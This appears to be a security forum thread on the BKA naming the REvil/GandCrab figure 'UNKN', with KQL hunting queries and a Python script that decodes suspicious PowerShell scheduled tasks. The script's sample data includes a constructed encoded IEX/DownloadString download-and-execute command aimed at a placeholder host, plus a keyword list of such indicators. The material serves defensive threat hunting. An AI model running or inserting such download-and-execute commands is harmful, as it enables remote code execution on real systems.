The 'UNKN' Reveal: Analyzing OPSEC Failures in the GandCrab/REvil Ecosystem
Finally, we have a name to put to the mask. The BKA's doxing of Daniil Shchukin ('UNKN') closes a major chapter on the GandCrab/REvil saga. It’s fascinating that they tied him directly to 130 specific acts of sabotage between 2019 and 2021. While the headline is about the arrest, for us defenders it’s a reminder of how persistent these legacy TTPs remain.
Even though REvil’s infrastructure was dismantled, the Double Extortion model they perfected is the blueprint for modern gangs. We often focus on the zero-days, but let's not forget the basics: Shchukin’s groups frequently gained initial access via RDP brute-forcing and unpatched VPN appliances.
If you are doing any retrospective hunting or auditing environments from that era, you might still find dormant persistence mechanisms. Here is a KQL query to help root out suspicious Scheduled Tasks that mimic the obfuscation techniques often used by REvil/Sodinokibi loaders:
// Hunt for suspicious scheduled tasks often associated with ransomware dwellers
ScheduledTask
| where TaskName contains "Update" or TaskName contains "System"
| where Action contains "powershell" and Action contains "-enc"
| where Author == "" or Author == "N/A" or Author contains "Administrator"
| project Timestamp, DeviceName, TaskName, Action, Author
| order by Timestamp desc
Given that the source code for GandCrab was "retired" but effectively recycled, are you still seeing traces of their encryption logic in modern, lower-tier ransomware families today?
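As an added example (not code from the original post, and not a REvil artifact), here is the same hunt the KQL query above performs, carried one step further in Python: instead of just matching on "-enc", it decodes the base64/UTF-16LE payload so an analyst can see what the task actually runs, then scores each task. The task records, the field names (TaskName, Author, Action) and the indicator list are constructed for illustration and do not reflect any real EDR schema or real telemetry.

```python
import base64
import re


def _ps_encode(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample records (hypothetical, not real telemetry). The keys mirror the
# columns used in the thread's KQL query so the two can be compared side by side.
SAMPLE_TASKS = [
    {   # Benign-looking name, empty author, hidden encoded downloader: the pattern being hunted
        "TaskName": "\\Microsoft\\Windows\\SystemUpdate",
        "Author": "",
        "Action": "powershell.exe -NoP -W Hidden -enc "
                  + _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    },
    {   # Legitimate admin job that also uses -EncodedCommand, but with a named author and a harmless script
        "TaskName": "\\Ops\\UpdateInventory",
        "Author": "CORP\\svc-inventory",
        "Action": "powershell.exe -ExecutionPolicy Bypass -EncodedCommand "
                  + _ps_encode("Get-ComputerInfo | Export-Csv C:\\inv\\host.csv"),
    },
    {   # Ordinary built-in task with nothing to decode
        "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
        "Author": "Microsoft Corporation",
        "Action": "%windir%\\system32\\defrag.exe -c -h -o -$",
    },
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand. Requiring whitespace before
# "-e" and after the switch keeps -ExecutionPolicy from being mistaken for it.
_ENC_RE = re.compile(r"(?:^|\s)-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Substrings in the decoded payload that raise the score (illustrative list, not exhaustive).
_SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-expression", "iex ", "iex(",
               "frombase64string", "invoke-webrequest", "-w hidden")


def decode_encoded_command(action: str):
    """Return the decoded -EncodedCommand payload found in an action string, or None."""
    m = _ENC_RE.search(action)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_task(task):
    """Return (score, decoded_command, reasons) for one task record."""
    reasons = []
    decoded = decode_encoded_command(task["Action"])
    if decoded is not None:
        reasons.append("encoded powershell command")
    if task["Author"].strip() in ("", "N/A"):
        reasons.append("missing author")
    if decoded is not None:
        hits = [s for s in _SUSPICIOUS if s in decoded.lower()]
        if hits:
            reasons.append("decoded payload contains: " + ", ".join(hits))
    # One point per generic reason, two points when the decoded payload itself looks hostile
    score = sum(2 if r.startswith("decoded payload") else 1 for r in reasons)
    return score, decoded, reasons


def hunt(tasks, threshold=2):
    """Return tasks scoring at or above the threshold, highest score first."""
    findings = []
    for t in tasks:
        score, decoded, reasons = score_task(t)
        if score >= threshold:
            findings.append({"TaskName": t["TaskName"], "Score": score,
                             "Decoded": decoded, "Reasons": reasons})
    return sorted(findings, key=lambda f: f["Score"], reverse=True)


if __name__ == "__main__":
    for f in hunt(SAMPLE_TASKS):
        print(f["Score"], f["TaskName"])
        print("    decoded:", f["Decoded"])
        print("    reasons:", "; ".join(f["Reasons"]))
```

The decode step is the part the KQL cannot do on its own: matching on "-enc" alone also catches the legitimate inventory job above, which only drops out once its decoded payload is inspected and its author is present. In production the same logic belongs in a notebook or a custom detection fed by the EDR's scheduled-task events, with the indicator list tuned to the environment.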
We actually caught a derivative of the GandCrab v5 script on a legacy server last month during a decommissioning audit. It wasn't active, but the persistence mechanism was still in the registry run keys. It’s a testament to how long these artifacts can survive if you aren't doing aggressive EDR sweeping. The KQL query is solid—I added a filter for TriggerType == 6 (Boot) to catch the ones that fire up immediately on restart.
It’s wild that it took this long to tie him directly to GandCrab. The transition from GandCrab to REvil was always rumored to be an 'M&A' of the cybercrime world, but seeing the BKA confirm the continuity of leadership is huge. From a pentester's perspective, their RDP exploitation was brutal; they didn't need sophisticated 0-days when orgs were leaving port 3389 exposed to the world with weak passwords.
Good to see the 'UNKN' mystery solved. I'm more interested in the 130 confirmed victims in Germany alone. It makes you wonder about the global victim count that wasn't reported. We've seen a shift recently away from pure encryption to pure data extortion, likely because of the pressure REvil faced post-Colonial Pipeline. This arrest might accelerate that trend among newer gangs trying to avoid the same heat.
The scary part is how effective those legacy TTPs remain against unpatched OT systems. Even if the C2 is dead, the local encryption capability is the real threat. We've been hunting for specific file creation patterns associated with older REvil variants to ensure nothing is lingering near our DMZs.
// svchost.exe legitimately runs only from System32/SysWOW64; a copy under a user's Roaming profile is masquerading
DeviceProcessEvents
| where ProcessVersionInfoOriginalFilename == "svchost.exe"
| where FolderPath contains "AppData\\Roaming"
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, SHA256